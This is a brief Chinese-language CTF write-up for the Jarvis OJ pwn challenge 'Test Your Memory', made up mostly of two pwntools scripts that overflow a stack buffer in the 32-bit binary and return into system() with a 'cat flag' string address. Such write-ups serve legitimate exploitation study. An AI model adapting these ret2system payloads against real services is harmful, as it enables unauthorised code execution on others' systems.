[Jarvis OJ - PWN]——Test Your Memory
- 题目地址: https://www.jarvisoj.com/challenges
- 题目:
32位程序,开了NX保护
IDA
exploit
from pwn import *
#p = process("./memory")
p = remote("pwn2.jarvisoj.com",9876)
context.log_level = 'debug'
cat_flag_addr = 0x080487E0
sys_addr = 0x080485C9
p.recvuntil('\n------Test Your Memory!-------\n\n')
s2 = p.recv(10)
print s2
payload = (s2 + '\x00').ljust(0x13 + 0x4, 'a')
payload += p32(sys_addr) + p32(cat_flag_addr)
p.sendlineafter("> ", payload)
p.interactive()
做绕过检查习惯了,一时间没反应过来
其实直接这样写也可以
from pwn import *
#p = process("./memory")
p = remote("pwn2.jarvisoj.com",9876)
context.log_level = 'debug'
cat_flag_addr = 0x080487E0
sys_addr = 0x080485C9
payload = 'a' * (0x13 +0x4)
payload += p32(sys_addr) + p32(cat_flag_addr)
p.sendlineafter("> ", payload)
p.interactive()